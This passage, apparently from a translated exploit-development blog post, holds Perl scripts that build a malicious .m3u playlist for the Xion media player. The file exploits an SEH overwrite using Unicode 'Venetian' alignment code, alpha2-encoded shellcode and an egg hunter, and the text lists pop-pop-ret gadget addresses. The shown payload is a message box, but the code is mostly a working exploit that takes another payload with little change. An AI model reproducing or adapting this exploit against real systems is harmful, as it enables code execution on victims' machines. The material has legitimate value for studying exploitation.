     $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
     $VenetianShellcode =$VenetianShellcode."\x6e";
    #229fe54 - 229fd76 = DE = 222  just need 111  cannot use push eax / ret: c3 is not converted correctly to c3
    
    my $junk2  =  "\x48\x6e"x42;               #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
     $junk2  = $junk2."\x70"x6; #2)"\x70"   jo xxx   either 1) or 2) can serve as nops to align eax to the first byte of the shellcode
    #the buffer from here on is 1840 bits, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
    my $buf = 
    "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
    "\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
    "\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
    "\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
    "\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
    "\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
    "\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
    "\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
    "\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
    "\x34\x4a\x42\x45\x39\x5a\x46\x58\x59\x58\x4e\x58\x59\x54" .
    "\x36\x4b\x44\x50\x59\x51\x39\x50\x49\x50\x49\x51\x39\x51" .
    "\x39\x51\x39\x50\x49\x50\x49\x50\x49\x51\x39\x51\x39\x51" .
    "\x33\x51\x33\x50\x43\x51\x33\x50\x43\x51\x33\x50\x37\x50" .
    "\x51\x51\x4a\x52\x4a\x51\x31\x52\x38\x52\x30\x50\x30\x51" .
    "\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50\x51\x50" .
    "\x32\x51\x31\x51\x32\x50\x32\x51\x32\x51\x32\x50\x30\x51" .
    "\x32\x51\x32\x51\x31\x50\x42\x51\x48\x52\x30\x50\x38\x51" .
    "\x31\x50\x42\x43\x45\x50\x4a\x51\x39\x52\x30\x50\x31\x50" .
    "\x5a\x52\x52\x51\x48\x50\x32\x50\x54\x54\x30\x52\x32\x51" .
    "\x34\x50\x4e\x52\x4b\x51\x44\x52\x32\x50\x4c\x50\x4b\x50" .
    "\x51\x51\x32\x52\x36\x52\x4c\x50\x4c\x50\x4b\x51\x33\x51" .
    "\x52\x51\x37\x52\x4c\x50\x4e\x52\x4b\x50\x51\x50\x52\x50" .
    "\x47\x43\x48\x50\x4e\x52\x4b\x52\x34\x50\x32\x50\x47\x50" .
    "\x50\x50\x4c\x50\x4b\x52\x36\x54\x32\x50\x4f\x52\x50\x50" .
    "\x51\x52\x4e\x50\x56\x52\x4c\x51\x35\x43\x33\x52\x34\x50" .
    "\x35\x51\x39\x52\x42\x50\x4c\x50\x49\x52\x38\x51\x37\x50" .
    "\x43\x50\x33\x50\x51\x51\x58\x50\x47\x50\x4c\x50\x4c\x50" .
    "\x4b\x52\x30\x50\x57\x52\x32\x50\x58\x50\x45\x50\x51\x50" .
    "\x4f\x50\x32\x50\x4e\x52\x4b\x50\x51\x52\x4a\x51\x37\x50" .
    "\x50\x51\x35\x50\x51\x50\x4b\x43\x47\x52\x34\x52\x51\x52" .
    "\x38\x52\x4d\x50\x4c\x50\x4b\x51\x35\x52\x44\x50\x4e\x50" .
    "\x4f\x50\x43\x50\x31\x50\x4b\x54\x36\x50\x52\x52\x45\x50" .
    "\x4f\x54\x31\x51\x37\x50\x4e\x51\x37\x50\x36\x52\x30\x51" .
    "\x51\x52\x31\x52\x44\x51\x35\x50\x31\x52\x34\x50\x35\x50" .
    "\x49\x43\x32\x50\x4b\x50\x31\x52\x31\x52\x4e\x50\x54\x50" .
    "\x48\x51\x37\x50\x35\x52\x30\x43\x48\x52\x30\x43\x39\x51" .
    "\x42\x51\x44\x52\x30\x52\x55\x50\x58\x52\x49\x50\x4e\x52" .
    "\x4b\x50\x43\x50\x4a\x51\x44\x52\x44\x51\x33\x50\x31\x50" .
    "\x4f\x50\x37\x50\x50\x43\x36\x50\x4e\x52\x4b\x51\x46\x50" .
    "\x4c\x52\x30\x52\x4f\x50\x4c\x50\x4b\x51\x33\x50\x4a\x50" .
    "\x47\x52\x4c\x50\x45\x50\x51\x50\x4f\x50\x37\x50\x4c\x50" .
    "\x4b\x50\x43\x50\x4c\x50\x4e\x50\x4f\x51\x39\x52\x4c\x51" .
    "\x46\x43\x31\x51\x48\x50\x47\x50\x52\x51\x38\x50\x43\x51" .
    "\x44\x50\x43\x50\x51\x50\x43\x52\x50\x51\x37\x54\x31\x52" .
    "\x30\x43\x38\x50\x47\x50\x30\x50\x54\x50\x30\x51\x35\x50" .
    "\x31\x50\x52\x50\x4e\x50\x4b\x50\x39\x50\x4d\x50\x31\x50" .
    "\x4b\x50\x4e\x52\x32\x43\x39\x50\x45\x50\x57\x51\x44\x54" .
    "\x31\x50\x4b\x54\x30\x50\x56\x50\x31\x52\x30\x50\x50\x50" .
    "\x4b\x50\x4f\x50\x5a\x54\x37\x51\x31\x51\x31\x41\x41";
    
    #junk 
    $junk = "A"x235;
    
    my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
    
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
    open($FILE,">$file");
    print $FILE $payload;
    close($FILE);

    Next, build a Unicode version of egg hunting. Egg hunting handles the case where there is not enough room for the characters: the shellcode is written somewhere else, then searched for and executed.



    Build the shellcode:

    root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin

    ... (output omitted)

    root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
    PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A... (truncated)


    my $file = "test.m3u";#perl
    #my $junk = "A"x270;
    
    
    my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
    my $seh =  "\x34\x47";#"\x34\x47";pop pop ret
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    
    
    my $VenetianShellcode ="\x6e";
     $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
     $VenetianShellcode =$VenetianShellcode."\x6e";
    #229fe54 - 229fd76 = DE = 222  just need 111  cannot use push eax / ret: c3 is not converted correctly to c3
    
    my $junk2  =  "\x48\x6e"x42;               #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
     $junk2  = $junk2."\x70"x6; #2)"\x70"   jo xxx   either 1) or 2) can serve as nops to align eax to the first byte of the shellcode
    #the buffer from here on is 1840 bits, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
    my $egghunter = 
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
    #the egg is \x00\x30\x00\x74
    $junk2 = $junk2.$egghunter;
    my $garbage = "X"x100; #garbage filler
    
    my $aligin = "\x6d".
    "\x57".  #push edi
    "\x6d".
    "\x58".  #pop eax
    "\x6d".
    "\x05\x14\x11".#05 00140011   add eax,0x11001400
    "\x6d".
    "\x2d\x13\x11".#2D 00130011   sub eax,0x11001300  eax+0x100
    "\x6d".
    "\x40".  #inc eax
    "\x6d".
    "\x70"x113;#note: the difference obtained from the add/sub has to be divided by 2
    
    my $buf =("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYIZKUKXYRTMTJTNQZ27BSGNQ8I34TKD1NPDK46LLDKRVML4KQ6LHTK3NO04KNVOHPOMHBUL3PYKQXQKO9QQP4K2LMTO4TKPEOL4K1DMXBXM1ZJ4KOZN84KPZMPKQJKK3P4Q9DKNT4KKQZNNQKONQY0KLVLU47PBTKWWQXOLMM1WWJKJTOK3LNDMX459QDK1JMTM1JK36TKLL0KDKQJMLM1ZKTKLDTKKQJHTIOTO4MLQQ8C7BLHMYHTSYK5E9WRS8TN0NLNZL22IXUOKOKOKOU9OULDWKCNIHZB3CTGMLMT22YXDNKOKOKOU9PEKXBH2LBLO011RHP3P2NN1TQXRU2SC52R4H1LO4KZ3YJFPVKO25KTE98B20WKUX6B0MWL4GMLND229X1QKOKOKO1X1TP0MSQHQXMS2P1QBNNQIKCX1LO4KW4IYSQX1T00MS28QXNC2P1Q2NNQI9THPLNDKWCYYQNQZ21BPSR1PRKOXPNQWPB0KO0ULHA");
    #panda0#
    $junk = "A"x235;
    
    my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));
    
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;
    open($FILE,">$file");
    print $FILE $payload;
    close($FILE);
  • Original article: https://www.cnblogs.com/zcc1414/p/3982354.html